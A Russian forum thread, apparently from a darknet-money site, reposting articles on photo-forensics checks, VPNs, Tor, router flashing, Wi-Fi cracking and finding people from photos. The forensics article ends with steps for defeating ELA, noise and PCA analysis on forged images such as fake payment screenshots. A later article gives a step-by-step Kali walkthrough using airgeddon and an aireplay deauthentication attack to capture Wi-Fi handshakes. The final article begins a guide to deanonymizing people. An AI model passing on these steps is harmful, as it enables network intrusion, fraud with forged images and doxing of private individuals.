
https://i.gyazo.com/50288fe527b25d83...a9507c065f.jpg

Ко всему прочему, монтаж может быть настолько дилетантским, что, загрузив фото в ExifTool, вы увидите такую картину:

https://i.gyazo.com/7aaa777d3a4b2564...61a27ecd08.jpg


Иногда не нужна никакая программа, чтобы сказать, что фото побывало в фотошопе.

https://i.gyazo.com/4fc27c602307c481...9c81e1adfb.jpg


Также загружаем фото в поиск по картинкам и находим оригинал:

https://i.gyazo.com/dc983ce59d3e6e00...c48993b0fa.jpg


Если гугл поиск не дал результатов, есть еще один способ найти первоисточник фотографии:
  • В этом поможет сайт TinEye - поиск по изображениям и платформам, где эти фото хостятся. Найдет фотографии, даже если над ними была проделана определенная работа в фотошопе.
  • Добавьте фотографию и нажмите на "Oldest", так вы увидите первоисточник.
Если отрисовщик оказался не из новичков, то потребуются более серьезные меры. Все нижеописанные методы базируются на программеForensically.

Error Level Analysis или ELA

При сохранении фотография каждый раз сжимается, меняется количество пикселей, конвертируются цвета - так устроен формат JPEG. И даже если вы загружаете фотографии в высоком разрешении, разница в качестве все равно будет присутствовать.

При обычном осмотре фото, недочеты не так уж просто заметить, скорее даже невозможно. Тут на помощь приходит ELA - анализ фотографии на наличие наложений, различий в качестве и несоответствий в цветовой гамме. После редактирования уровень детализации значительно теряется, и любая область, темнее или светлее других, говорит о том, что фотошоп присутствовал. Работает ELA просто: обработанная область должна иметь различие в цвете.

Возьмем для примера фото из интернета. Мошенники часто делают фейковые скрины переводов, и сейчас мы будем разоблачать один из таких.

https://i.gyazo.com/d4c4b05f0209ec93...8c68dd6640.jpg

На первый взгляд ничего необычного. Теперь загрузим фото в Forensically и выберем "Error Level Analysis".

https://i.gyazo.com/e551d16bc85ccbae...e409f370d8.jpg


Обратите внимание на появившиеся вклейки, которые отображаются другим цветом. Можно с 99 % уверенностью сказать, что фотография подвергалась монтажу.

ELA не всегда работает верно. Если мы возьмем любую фотографию с контрастным фоном, то анализ покажет тот же самый результат.

https://i.gyazo.com/4a78f6b628fd14d1...6a55e80273.jpg

Именно поэтому нельзя полностью доверять этому методу. Для работы с ELA выбирайте фото с однотонными областями и без резких переходов. И всегда перепроверяйте с помощью других методов.

Noise Level Analysis

Исходное изображение и наложенная картинка или текст имеют различия в шумах. Так, Noise Level Analysis ищет шум и деформацию, появившиеся после редактирования.

Снова проверим на нашей картинке:

https://i.gyazo.com/dbbcaa84f8475972...f17750a879.jpg

Что наблюдаем? А видим мы увеличение шума в той же области, чего быть не должно.

Luminance Gradient Analysis

Покажет наличие фотошопа, ретуши, хромакея.

Работает данный способ со светом, который присутствует на любой фотографии. Как в жизни, так и на фото на объект всегда направлен источник света: чем ближе он к источнику, тем освещенность выше, дальше - ниже.

Рассмотрим на примере двух фотографий: НЛО и самолет в небе.

https://i.gyazo.com/2ca047d6d09abb12...2cc64ce697.jpg

После анализа фотографии на градиент освещенности, было замечено, что свет падает неестественно, переход между тенями и светлыми участками слишком резкий. Чтобы окончательно убедиться в нереальности НЛО ( ̶я̶ ̶х̶о̶ч̶у̶ ̶в̶е̶р̶и̶т̶ь̶), мы добавим фотографию на проверку шумов. Вся тарелка светится как солнце в ясный день, что окончательно подтверждает нашу теорию.

Для сравнения возьмем другое фото:

https://i.gyazo.com/a329ab3b10efc78b...7872fa17e2.jpg

Сравните как равномерно падает свет на самолет, никаких резких переходов - вверху область с наибольшей освещенностью, внизу с наименьшей - это говорит о рассеянном свете.

Данный метод определения монтажа один из самых выигрышных, он работает практически на любой фотографии, и любителям фотошопа не всегда удается его обхитрить.

Principal Component Analysis или PCA

Простым языком суть этого метода заключается в том, что если объекты находятся не на своих местах, то они будут отображаться на PCA в виде ярких пикселей, несоответствий цветов. Это будет значить, что на фото присутствует локальный монтаж (Healing Brush) или вклейка (Clone Stamp), или все вместе как на нашем примере:

https://i.gyazo.com/97fa6c9cb097b0a5...7a9535b708.jpg

На фоне тарелки и на самом небе есть очень заметные пиксели. Скорее всего помимо полной вклейки проводилась и другая работа над картинкой, возможно, точечно удалялись птицы. Стоит отметить, что подобные крупные пиксели не всегда бывают на фото, чаще всего требуется увеличивать зум в различных областях и долго всматриваться, чтобы найти "обман".

Как обхитрить

Error Level Analysis
  1. Не хочешь, чтобы переходы и различия в цвете выдали твой потрясающий монтаж? Пересохрани фотографию 10 раз, и ELA не покажет ничего примечательного.
  2. Если не охота заморачиваться с сохранением, то можно изменить размер на любой коэффициент не кратный 2. Например, уменьшаем фото на 7% - ELA становится бесполезным.
  3. Используйте формат PNG на двух фотографиях, ELA работает только c JPEG.

Noise Level Analysis
  1. Как скрыть появившийся шум на фото? Добавить своего шума, так чтобы нельзя было понять, где какой шум начинается.
  2. Если для обмана ELA мы меняли размер, то здесь нужно изменить качество раза так в 2.

Principal Component Analysis
  1. Замыльте место редактирования, так цвета и переходы станут более плавными и анализ фото по PCA не даст результатов.
  2. В случае как и с ELA, поможет изменение размера.

Итог:

Из-за растущей популярности ко всевозможным редакторам возникает некий ряд проблем, который может поставить под сомнение честность и добросовестность человека, использующего фотошоп. Дабы не дать себя обмануть, и самому не попасться на неумелом монтаже, мы разобрались как работают инструменты и как их можно обходить.

Image Forensics не совершенен. Он хорошо действует в том случае, когда человек не пытался утаить свою обработку. Если же монтажер знает о способах сокрытия своего обмана, то тут криминалистика изображений мало чем может помочь. Тем не менее, даже самый умелый пользователь фотошопа может совершить ошибку, что уж тут сказать про обычного человека.

https://telegra.ph/Ne-ver-svoim-glaz...-na-foto-01-28

BlackMAST 24.03.2022 18:13



https://i.gyazo.com/250a7db297700a34...5122f7f015.jpg

VPN от А до Я

Вступить в наш чат

VPN становится все более обязательным инструментом в наше время, ведь мы рискуем рассекретить себя каждый день. VPN - это уже не прихоть, а необходимость для каждого человека, который беспокоится о своей безопасности. Именно с VPN и начинается любая базовая защита в интернете. Если вы не хотите утечки своих личных данных, то самое время приоткрыть завесу и узнать, что же такое VPN, как он работает, какие виды VPN существуют, от чего защищает и самое важное - какой VPN лучше всего выбрать. Итак, мы начинаем.

https://i.gyazo.com/1e7dc74422b35697...932bb572da.gif

Что такое VPN

Аббревиатура VPN - Virtual Private Network, что в переводе значит виртуальная частная сеть. Это сервис, позволяющий защитить данные в сети путем их шифрования. Никто, в том числе и интернет-провайдер, не сможет прочесть и отследить запрашиваемую вами информацию в сети, потому что она исходит в виде зашифрованного трафика. VPN меняет ваш IP на свой адрес, поэтому вы обеспечиваете себе безопасное пользование сетью.

Как работает VPN

Соединение VPN можно охарактеризовать как канал между между вашим компьютером и компьютером-сервером, где узлы шифруют информацию до ее попадания в канал.

Вся работа VPN наглядно показана на следующей картинке:

https://i.gyazo.com/b2382deca87460ef...59baae0a0f.jpg
  • Ваш компьютер подключается к VPN и начинается процесс аутентификации;
  • Исходящий VPN пересылает информацию к сайту или серверу к которому вы обращались, то есть авторизует вас;
  • В результате установленного соединения весь трафик проходит путь в зашифрованном виде, следовательно, вы остаетесь в тени.

Для чего нужен VPN
  • В первую очередь VPN нужен для безопасного соединения, защиты трафика и сохранения анонимности;
  • VPN защищает от слежек, хакерских атак и перехвата данных;
  • VPN скрывает ваш реальный IP-адрес;
  • Дает доступ к заблокированным сайтам, форумам без ограничений;
  • Защищает от перехвата трафика в WI-FI сети.

Double VPN, Triple VPN, Quad VPN

С появлением обычных VPN, появились и сервисы, предоставляющие двойной, тройной VPN. Это связка нескольких VPN серверов, где вначале создается подключение между компьютером пользователя и первым VPN сервером. Затем создается второй шифрованный канал между первым и вторым VPN сервером, так трафик шифруется, и ваш IP адрес меняется несколько раз (дважды, трижды и т.д.).

https://i.gyazo.com/1de3897fb4c0fac9...cc05c961b0.jpg

Плюсы:
  • Провайдер видит первое подключение к VPN, но так как вы заходите в сеть еще и через второй сервер VPN, то он не знает ваш конечный IP адрес.
  • При каждом переподключении меняется ваш IP адрес: второй VPN сервер не знает ваш настоящий IP, потому что он скрыт первым VPN.
Минусы:
  • На каждом VPN сервере происходит расшифровка трафика.
  • Значительное снижение скорости (особенно при использовании Triple VPN и Quad VPN) из-за шифрования трафика, удаленности между несколькими серверами.
Итог:

Если вы не занимаетесь черными делишками и просто хотите скрыть настоящий IP, то вам идеально подойдет обычный VPN. Если вы думаете, что кому-то станет интересна ваша деятельность, то стоит сказать в пользу Double VPN, потому что двойное подключение действительно повышает вашу анонимность.

Нет необходимости использовать Triple VPN, Quad VPN, так как скорость подключения очень сильно пострадает, а дополнительный уровень защиты не прибавится.

Ну и, конечно же, не забывайте о комплексном подходе к защите и используйте и другие способы для вашей анонимности.

Цитата:


Но, чтобы не вводить себя в заблуждение, что VPN - универсальный способ безопасности, мы посмотрим, когда и в каких случаях VPN бесполезен:

https://i.gyazo.com/94f4ad317c677601...a33a5836fd.gif
  1. Спам. Вы получили фишинговое письмо в мессенджер, перешли по ссылке и тут же хакеры получили все, что хотели. Вывод: никогда не переходите по непонятным ссылкам от сомнительных отправителей, VPN в этом случае вам не поможет. Проверить ссылку на наличие спама, вирусов и фишинга можно тут или здесь.
  2. Чужой ПК. Вам пришлось поработать на компьютере, которым вы ранее не пользовались. Но он оказался зараженным, и все ваши данные утекли с концами. Вывод: VPN не поможет от троянов, никогда не пренебрегайте антивирусом и пользуйтесь только проверенными ПК.
  3. Сайты, которые вас палят. Вы сидите через нидерландский VPN и наблюдаете всплывающую рекламу на русском языке. Спросите: "как такое возможно?". Существует N-количество сайтов, которые следят за вами и пытаются узнать ваш настоящий IP-адрес. Если VPN не защищает от такого обнаружения, то сайтам это удастся. Помимо этого, сайты с легкостью могут деанонимизировать вас по следующим параметрам: язык операционной системы, версия браузера, сохраненные данные и др. Вывод: проверяйте безопасность подключения и наличие возможных утечек IP здесь, если утечка была, то действуйте следующим способом.
  4. Подставной VPN провайдер. Вы бесплатно скачали VPN на первом сайте адресной строки. Но сами не подозревая, только усугубили ситуацию. Многие VPN провайдеры, видя весь ваш трафик через VPN сервис, промышляют злодеяниями. А именно: перенаправляют вас на вредоносные сайты, где вы заражаете свой компьютер. Вывод: Забудьте про существование бесплатных VPN, покупайте только у проверенных VPN провайдеров, безопасность превыше всего!
Цитата:


К слову про того, как выбрать VPN, мы составили ТОП-5 надежных сервисов. Как уже было сказано ранее, не стоит доверять бесплатным VPN и экономить на своей безопасности.


Поехали!
Лучшие VPN:

NordVPN
  • Занимает первые позиции во многих обзорах и рейтингах VPN;
  • Самые мощные шифровальные алгоритмы, Double VPN, VPN+TOR и другие технологии для полной конфиденциальности;
  • Наличие функции kill switch, которая завершает подключение к интернету, когда связь с сервером VPN становится нестабильной;
  • Компания находится в Панаме, поэтому имеет независимый статус, т. е. деятельность пользователей никак не фиксируется и никому не передается;
  • Отказ от ведения логов;
  • Имеет программы-клиенты для ПК (Windows, MacOS) и для телефонов (Android, IOS).
Сервис, безусловно, платный. Стоимость подписки:

https://i.gyazo.com/2bb11d3fb9ef078a...8ee202e450.jpg

Surfshark
  • Главное отличие от NordVPN - это безлимитное количество устройств, в то время как в NordVPN разрешается не более 6;
  • Компания гарантирует защиту трафика путем шифрования военного уровня и технологий собственной разработки. Ваши действия не отслеживаются и не хранятся, логи не ведутся;
  • Наличие частного DNS на каждом сервере и защита от утечек при использовании стека IPv4;
  • Автоматически выбирает самый быстрый сервер для подключения, но так же можно указать страну вручную.;
  • Подстраховка в виде Kill Switch на случай, если VPN подключение прервется.
Стоимость подписки примерно такая же, как и у NordVPN:

https://i.gyazo.com/65eab5ae401eccde...bd4e11e025.jpg

CyberGhost
  • Универсальный VPN из Румынии с надежной политикой ведения логов: не записывает информацию о посещении сайтов и скрывает IP адрес;
  • Бесплатный период - 7 дней;
  • Разрешает до 7 одновременных подключений с одного аккаунта;
  • Поддержка 24/7, которая готова ответить на вопросы по работе провайдера;
  • При построении защищённой системы использует разные протоколы: OpenVPN, L2TP\IPsec, и IKEv2;
  • Большое количество платформ, в том числе ОС телевизоров и роутеров;
  • Поддержка P2P на отдельных серверах.

https://i.gyazo.com/d4bb1ffe43817094...65d7c785b7.jpg

PureVPN
  • Штаб-квартира в Гонконге;
  • Безопасность военного уровня гарантирует пользователю высокую конфиденциальность;
  • Совместимость практически со всеми существующими платформами и ОС;
  • Техподдержка 24 часа в сутки, 7 дней в неделю, 365 дней в году;
  • Наличие Kill Switch - безопасное отключение от сети;
  • До 5 устройств одновременно.
Стоимость:

https://i.gyazo.com/b9c320448f18b7e1...81bc38ee33.jpg

Мастер VPN
  • Высокая степень безопасности и защищенности;
  • При построении защищённой системы использует разные протоколы: OpenVPN сервер, DoubleVPN или IKEv2;
  • Индивидуальный заказ. Создается любая конфигурация в зависимости от ваших задач;
  • Имеет программы-клиенты для ПК, для телефонов и планшетов;
  • Единоразовая плата - 1500-2000 р.
Мы разобрали различные популярные VPN-сервисы и рассмотрели их плюсы.
Если вы дорожите своей безопасностью, вам важно удобство и индивидуальный подход за небольшую плату- то однозначно обратите внимание на MasterVPN.

Вывод:

Относитесь серьезно к вашей безопасности и пользуйтесь только надежными VPN сервисами. К сожалению, многие платные и бесплатные VPN сервисы лишь создают иллюзию защиты, а на самом деле ведут логи, собирая о вас информацию. К тому же, несмотря на то что VPN использует надежные алгоритмы шифрования, он не гарантирует 100% сохранения анонимности, поэтому помимо VPN существуют и другие способы защиты - Proxy, Tor, которые следует использовать в связке. Надеюсь, что вы почерпнули что-нибудь новое из данной статьи. В следующий раз мы научимся самостоятельно настраивать собственный VPN сервер и VPN на роутере.
"Если не уверен в безопасности, считай, что опасность реально существует."

https://telegra.ph/VPN-ot-A-do-YA-02-01


BlackMAST 24.03.2022 18:15



https://i.gyazo.com/c2edb913a0f0d7b1...65746e8cf3.jpg

Tor browser - что это за "овощ" такой и с чем его едят?

Вступить в наш чат

На просторах даркнета не стоит забывать о безопасности. Вы можете стать отшельником, уехать в глушь, прихватив с собой ноутбук, захламить рабочий стол VPN сервисами, но при этом все равно вас легко смогут вычислить.

Цитата:


Данная статья будет полезна всем, кто только начинает открывать для себя теневой интернет мир и для тех, кто хочет оградить себя от неприятных последствий.


Одним из обходных путей, способным запутать цепочку являетсябраузер Tor. Мы разберем с вами основные FAQ, а также выясним как его установить на ПК и Android. А приятным бонусом ко всему будут полезные фишки, которые облегчат и ускорят работу с данным браузером. Так что читай до конца.

Что такое TOR?

TOR - это аббревиатура от слов The Onion Router, что в переводе означает "Луковый маршрутизатор". Само название говорит о принципе его работы. Tor трижды кодирует ваш трафик, тем самым создавая три слоя луковицы. Его задача - это соединить ваш компьютер с другими тремя компьютерами, чтобы не было понятно откуда изначально пришел трафик и куда он направляется.

https://i.gyazo.com/f25c16bf318ebfbd...60e90f88cd.jpg

Для чего нужен TOR?

Основная задача, с которой прекрасно справляется данный браузер - сохранение анонимности. Под «анонимностью» обычно понимают, что пользователю удается скрыть от третьих лиц:
  • свою геопозицию и даже страну, с территории которой он выходит в сеть;
  • сайты, к которым он обращается;
  • временные периоды, в течение которых устанавливаются соединения;
  • сведения об аппаратном и программном обеспечении, которое он использует.
Также Tor нужен для того, чтобы попасть в Tor Network и обойти блокировки Роскомнадзора.

Что такое Tor Network?

Это теневой интернет, который целиком состоит из компьютеров с установленными на них TOR-ами. То есть каждый сервер в Tor Network обязательно имеет TOR - луковый маршрутизатор. С помощью Tor Network можно попасть на сайты .onion.

Нужно ли использовать Tor вместе с VPN?

Да, подключение этого типа помешает узлам Tor узнать ваш исходный IP-адрес, что послужит дополнительным уровнем защиты. VPN скрывает от провайдера сам факт использования Tor, он увидит лишь зашифрованный трафик, отправленный вашему VPN-серверу. Вы можете сначала подключиться к VPN, а потом к Tor (получится VPN -> Tor).

Что такое мосты?

Это входные ноды (узлы) Tor, которые передают данные с дополнительной защитой. Мосты придумали для того, чтобы трафик Tor невозможно было заблокировать, поскольку они шифруют его на отрезке - абонент -> входная нода. В конце статьи я поделюсь с вами лайфхаком как их создать.

Устанавливаем TOR на компьютер

Переходим на официальный сайт https://www.torproject.org/

https://i.gyazo.com/a2797b126aee2f4d...4452e0235a.jpg

Нажимаем "Download Tor Browser".

https://i.gyazo.com/10d46ae50c4d2cef...a9a7b37da2.jpg

После выбираете вашу операционную систему и ждете окончания загрузки.

https://i.gyazo.com/53449151bce0b77d...b1aca0df3c.jpg

После окончания установки открывается окно, где нужно нажать "Connect".

https://i.gyazo.com/e19579f67458aceb...20fb2178b0.jpg

Через несколько секунд у нас открывается браузер, теперь мы можем открывать ссылки ".onion".

Устанавливаем TOR на телефон

Заходим в Play Market здесь нам понадобится установить 2 приложения - TOR Browser и Orbot. В App Store нет официального приложения TOR Browser и Orbot, поэтому придется поискать аналоги.

https://i.gyazo.com/41d87c1c1cd317fd...7c9858e7b3.jpg

https://i.gyazo.com/91b6bd855ad94481...4256f531df.jpg

Как только всё установили, запускаем Orbot и включаем режим VPN.

https://i.gyazo.com/46458685c67d538b...66e3a0b910.jpg

Готово! Можете открывать браузер и пользоваться.

Минусы Tor:
  • провайдер может увидеть, что вы пользуетесь Tor, но ему известен только сам факт его использования, трафик шифруется внутри Tor и остается в его пределах;
  • Tor замедляет скорость вашего интернета, поскольку трафик проходит через большое количество ретрансляторов;
  • Tor не может защитить вас полностью, если вы пренебрегаете осторожностью (платите со своей карты, скачиваете торренты, заходите в соцсети);
  • Многие веб-сервисы ограничивают доступ к Tor. При посещении таких сайтов вы можете столкнуться с ошибкой, например, 404.
Несмотря на небольшое количество недостатков, Tor вполне справляется с обеспечением вашей анонимности и безопасности на просторах интернета.

Полезные фишки при работе с Tor:

Отключаем анимацию банеров

Банеры расположены на всех теневых площадках, иногда в огромном количестве, что не может не надоесть. Отключение займет не больше 1 минуты.



https://i.gyazo.com/59223c55c41631db...972bcc54df.jpg

Подтверждаем наше действие.

https://i.gyazo.com/7ebc7a528e025296...b1c7d26290.jpg

Вводим в поиск image.animationи кликаем на значок редактирования.

https://i.gyazo.com/6f4f4f7c835e71b0...db258cb53c.jpg

Изменяем параметр normal на none.

Готово! Осталось перезапустить браузер и наслаждаться отсутствием рекламы.

Ищем сайты .onion

Если вы все сделали правильно и установили Tor, то у вас все равно может возникнуть вопрос: "Так как же попасть в даркнет?" В этом нам помогут сайты .onion. Многие люди, не понимая как их найти, продолжают искать информацию через duckduckgo - встроенный поисковик в браузере.

А ведь по сравнению с обычными версиями сайтов .onion обеспечивают дополнительную анонимность и безопасность, так как подобные адреса не являются полноценными записями DNS, и информация о них не хранится в корневых серверах DNS.

OnionLand Search - актуальная ссылка

https://i.gyazo.com/91b6745881edc7a8...2c889e951a.jpg

Кто ищет, тот всегда найдет












https://darkmoney.one/images/smilies/smile.gif

Настройка мостов

https://i.gyazo.com/66d86aab23ba73c7...d36bbead88.jpg

Запускаем Браузер, затем открываем параметры.

https://i.gyazo.com/e651bd1f999d2a64...c34408590d.jpg

Слева выбираем Tor и устанавливаем все параметры как на скриншоте.

https://i.gyazo.com/9758ba299e226ec6...49c7c2dbec.jpg

Перезапускаем браузер, открываем любой сайт. А теперь проверяем, нажав на значок "замок" слева в адресной строке.

Таким образом мы научились настраивать мост.

Надеюсь, что данная статья была полезной. Успехов!

https://telegra.ph/Tor-browser---cht...go-edyat-03-04

BlackMAST 24.03.2022 18:18



https://i.gyazo.com/6f50461855feb324...533ca20142.jpg

VPN на роутере: что это такое и как настроить

Вступить в наш чат
Цитата:


VPN-сервисы используются повсеместно, поскольку они являются гарантом безопасности в интернете: защита от хакерских атак и перехвата данных, возможность скрыть ваш настоящий IP-адрес, доступ к заблокированному контенту и многие другие вещи, которые подвластны виртуальным частным сетям.

Из прошлой статьи мы выяснили, что не все сервисы предоставляют VPN, который поддерживает неограниченное количество устройств. Если так случилось, что вам нужно одновременно установить VPN на 10 устройств, и вы не хотите устанавливать и настраивать его на каждом из них, то самое время поговорить про VPN подключение на роутере. Мы разберемся, как легко и просто это сделать всего за 15 минут.

https://i.gyazo.com/5eb6631e2ffdf6ce...8b0fa37f2b.jpg

Чтобы пользоваться VPN на роутере вам понадобится:
  • выбрать надежный VPN-сервис;
  • определиться с роутером;
  • настроить VPN.
VPN-сервис

К сожалению, нельзя доверять каждому сервису, который предоставляет VPN. Не советуем рисковать и выбирать первый попавшийся, лучше ознакомьтесь с нашим ТОП-5 VPN, о которых мы писали в предыдущей статье, так вы убережете себя от возможных ошибок.

Преднастроенный VPN-роутер

Преднастроенный роутер - самый дорогой из VPN-роутеров. За эти деньги вы получаете уже готовое к работе устройство, не требующее перепрошивки или настройки. При выборе роутера следует обратить внимание на следующие пункты:
  • Решите какой VPN-протокол вам требуется. Например, если вы остановите свой выбор на Open VPN, то лучше всего будет приобрести роутер с одноядерным процессором. Open VPN отличается высоким уровнем шифрования, поэтому скорость подключения может значительно снижаться.
  • Вдобавок к этому, если скорость для вас является решающим фактором, то покупайте роутер с процессором не менее 800 МГц.


Как прошить роутер самостоятельно

VPN-роутер - недешевое удовольствие, поэтому неудивительно, что вам не захочется покупать его.Но же тогда делать? Можно ли использовать старый роутер?

И ответ положительный. Нет нужды покупать еще один роутер, если мы можем перепрошить старый, используя специальное ПО. Переходим на официальные сайты прошивок и ищем наше устройство DD-WRT и Tomato. Посмотрите, поддерживает ли ваш роутер прошивку, они доступны для большинства моделей роутеров.

DD-WRT - универсальный вариант, поддерживается множеством производителей, даже самыми малоизвестными: TP-Link, D-Link, Tenda.

Tomato - прошивка с меньшим количеством поддерживаемых устройств, но имеющая более простой интерфейс. Также является более подходящим вариантом для протокола OpenVPN.

Настройка VPN-роутера

Если роутер поддерживается одну из двух прошивок, то действуем следующим образом:
  1. Загружаем прошивку с официального сайта;
  2. Делаем сброс настроек. Для этого нажмите и удерживайте кнопку RESET на задней части устройства в течение 30 секунд, затем отключите роутер от питания и держите RESET еще в течение 30 секунд, включите роутер и снова зажмите эту же кнопку на 30 секунд.
  3. Чтобы настроить VPN-соединение, заходим в панель управления роутера через браузер. Адрес, по которому можно попасть на эту страницу, указывается в руководстве каждого роутера. Там же будут написаны и заводские данные для входа. Например, вводим в адресной строке браузера 192.168.0.1 или 192.168.1.1. Логин и пароль по умолчанию - admin.
  4. В панели управления (слева) выберите опцию обновления UPGRADE или UPLOAD FIRMWARE.
  5. Как только новая вкладка открылась, загрузите файл установки, а именно ранее скачанную прошивку Tomato или DD-WRT.
  6. Во время установки не делайте никаких действий, дождитесь несколько минут, когда файл загрузится и выберите Продолжить.
  7. Напоследок сделайте еще один полный сброс настроек и войдите в панель управления роутера. Если все сделали верно, то вы увидите новую функцию VPN.
Данная инструкция по перепрошивке подходит практически для каждой модели роутера.

К сожалению, если роутер не поддерживает такую возможность, то вам все же потребуется купить новое устройство.

Плюсы:

  • Неограниченное количество устройств. VPN будет защищать все новые устройства, которые вы подключаете, и вы сможете делиться защищенным подключением с членами семьи и друзьями, когда они подключатся к вашему Wi-Fi;
  • Совместимость с большим количеством платформ. У вас есть приставка Apple TV, но вы не можете установить на нее VPN? Однако вы хотите смотреть контент, доступ к которому ограничили в вашей стране. Воспользуйтесь VPN-роутером;
  • Вам нужно ввести логин и пароль только единожды. После того, как вы настроите VPN-роутер в первый раз, вам больше не нужно будет переживать по этому поводу, пользуйтесь сколько захотите.
Минусы:

  • Цена. Да, как мы уже выясняли покупать новый роутер с преднастроенной прошивкой не очень дешево. Хотя прошить роутер, как оказалось, не так уж и сложно, что можно определенно отнести к преимуществам;
  • Больше устройств - ниже скорость. Имейте в виду, что с каждым новым подключенным устройством, значительно падает производительность.


Вывод

Рассмотрев все явные преимущества и недостатки VPN-роутеров, можно отметить, что первых все-таки больше. При выборе стоит взвесить все ваши нужды и потребности: что вы ждете от VPN, сколько платформ вы используете, какой у вас бюжет. Если у вас всего 1 устройство и вам не нужно больше, то смысла в VPN-роутере нет. Но если же вам хочется пользоваться интернетом на многих устройствах и при этом быть уверенным в своей конфиденциальности и безопасности, то не пожалейте 15 минут и настройте VPN-роутер.

https://telegra.ph/vpn-02-04

BlackMAST 24.03.2022 18:21

https://i.gyazo.com/22fe8f6dc242d843...d60a6ed701.jpg

Учимся взламывать Wi-Fi всего за несколько шагов

Вступить в наш чат

Существует куча способов как взломать Wi-Fi. И это еще больше убеждает нас лишний раз подумать о дополнительной защите, а именно о необходимости использовать VPN. Подробнее об этом читайте здесь. В данной же статье мы рассмотрим самые распространенные методы взлома и на примере Kali Linux научимся перехвачивать handshake.

Текст статьи не является призывом к действию и публикуется для ознакомления со способами взлома и построения грамотной защиты.

Виды взлома:
  1. Перехват handshake - отключаем всех от сети, ловим пакет с авторизацией любого клиента и расшифровываем его;
  2. Brute-force паролей - перебор всех комбинаций возможных паролей по словарю;
  3. Фишинг - отправка фишинговой (левой) страницы пользователю Wi-Fi, с запросом на ввод пароля для входа(например, под предлогом обновления). Такой взлом можно делать самостоятельно или с помощью специального приложения Wifiphisher;
  4. WPS - подбор вероятных паролей или взлом стандартных заводских PIN-кодов. Роутеров с включённым WPS становится всё меньше, но этот способ еще имеет место быть.
Цитата:


Существуют и другие подходы к получению доступа, но мы не будем на них зацикливаться и перейдем к практической части - взлом с использованием Kali handshake.


Kali Linux

Kali является лучшим бесплатным дистрибутивом для осуществления хакерских атак. Kali включает в себя более 300 утилит для удобства в работе, поддерживает практически все файловые системы, интерфейсы и типы накопителей. Если вы пользователь Windows, но хотите испытать Kali в деле, то перед началом установите дистрибутив на VirtualBox.

1. Установка Kali в VirtualBox

Устанавливаем последнюю версию VirtualBox и скачиваем Kali Linux VirtualBox.

Выбираем 64-Bit или 32-Bit.

https://i.gyazo.com/cb2c4461cf66d4e6...b052948983.jpg

После того как VirtualBox установилось на ваш ПК, открываем и выбираем опцию Импортировать.

https://i.gyazo.com/f2d354aeb35804ef...e8045aa59b.jpg

Выбираем Kali Linux, устанавливаем количество ядер и ОЗУ для виртуальной машины и жмем на Импорт.

https://i.gyazo.com/dbd3132744c61e12...141420ca3e.jpg

Запускаем Kali Linux и вводим логин kali и пароль kali.

https://i.gyazo.com/debd9f9e10e84bdc...2df9eb840f.jpg

Цитата:


Перед тем, как перейти к непосредственной установке, вам нужно открыть терминал на компьютере с Kali Linux. Найдите и щелкните по иконке приложения Терминал или просто нажмите Alt+Ctrl+T.


2. Установка airgeddon

Скачиваем утилиту airgeddon на нашу машину с Kali. Данной утилиты нет по умолчанию в Kali, но она нам нужна для перехвата handshake.

sudo git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git Переходим в папку с установленной airgeddon и запускаем ее командой:

cd airgeddon/ sudo ./airgeddon.sh

3. Установка bettercap

Вероятнее всего у вас тоже не будет хватать утилиты bettercap. Bettercap – программа для мониторинга и спуфинга (когда программа маскируется под другую с помощью подмены данных). Устанавливаем этот инструмент, вводим в терминале простую команду:

sudo apt install bettercap

4. Мониторинг сети

Если к компьютеру подключен USB Wi-Fi адаптер, включим его следующим образом: Устройства → USB → MediaTek 802.11 n WLAN. Название Wi-Fi адаптера может отличаться, поэтому чтобы его узнать вводим команды ifconfig или ip a.

Далее выберите свой Wi-Fi адаптер. В нашем случае адаптер называется wlan0.

Переходим в главное меню и переводим наш адаптер в режим мониторинга, это цифра 2.

https://i.gyazo.com/c544516419f4f2d5...2839d524bd.jpg

5.Получение рукопожатий

Переходим в меню инструментов для работы c handshake, выбрав цифру 5. В этом меню нам нужно запустить поиск цели - цифра 4. Как только появится наша Wi-Fi точка, можно заканчивать поиск, для этого нажмем Ctrl+C. После чего выберите ее из списка.

Стоит отметить, что если на точке не будет пользователей, то сделать handshake не получится.

Цель выбрана, а значит цифрой 6 переходим в режим захват рукопожатия.

Мы наблюдаем 3 вида атаки:

1.Атака деаутентификации/разъединения amok mdk3

2.Атака деаутентификации aireplay

3.Атака смешения WIDS/WIPS/WDSУстройства

Нам же нужно выбрать вторую-Атака деаутентификации aireplay.

Этот способ лучше 1-го по той причине, что вам не придется ждать, когда пользователь введет пароль от точки.

Далее идет перехват, и вам предлагают прописать путь сохранения handshake в папке, что и нужно сделать.

На этом взлом handshake успешно закончен.

Итог

Итак, вы узнали какие способы взлома существуют, на примере научились делать мониторинг Wi-Fi сети и перехватывать рукопожатия. Вдобавок хочется поделиться несколькими советами для повышения вашей безопасности:
  1. Используйте VPN. Это основное и самое главное правило, если вы не хотите стать мишенью для недоброжелателей;
  2. Выключите режим WPS в роутере;
  3. Придумайте сложный пароль и регулярно меняйте его;
  4. Периодически обновляйте прошивку роутера.
Всем безопасного серфинга!

https://telegra.ph/Uchimsya-vzlamyva...o-shagov-02-07

BlackMAST 24.03.2022 18:22

https://i.gyazo.com/3465819ee8d9f339...4a9aec4ddb.jpg

Как пробить человека по фотографии

Вступить в наш чат

Найти человека в интернете по фото - это давно уже миф, а реальность. Даже одна фотография может выдать кучу информации: начиная от метаданных и заканчивая координатами, которые можно определить по виднеющейся улице на заднем плане. В этой статье мы поговорим о том, как деанонимизировать человека с помощью простых, а главное бесплатных средств.

Но для начала разберемся как устроен поиск по фотографиям, чтобы лучше понять его суть.

https://i.gyazo.com/4c22a2002d26b43b...0e2185b246.jpg

Метаданные, они же EXIF

Любая фотография формата JPEG содержит в себе метаданные. Они включают дату, название модели камеры или смартфона, а еще редактирование, если оно имело место быть. Но и самое интересное, что иногда метаданные могут показать геолокацию фотографии.

Именно с EXIF следует начинать поиск. Несмотря на то что любое устройство может отобразить эту информацию, возможности просмотра будут ограничены. Поэтому на помощь приходят специальные программы для расширенного просмотра.
  • ПриложениеExifTool является одной из таких, оно может прочесть огромный перечень данных с фото. И то не только EXIF, а еще и GPS, XMP, IPTC, JFIF, GeoTIFF, ICC Profile, Photoshop IRB и другие. Приложение бесплатное и поддерживает как Windows, так и MacOS.
  • Jeffrey's Image Metadata Viewer - сайт для определения EXIF, аналог ExifTool, разница лишь в том, что не требует установки на ПК.
  • Stolencamerafinder.com — определит метаданные и найдет какие еще фото были сделаны с помощью этого устройства.
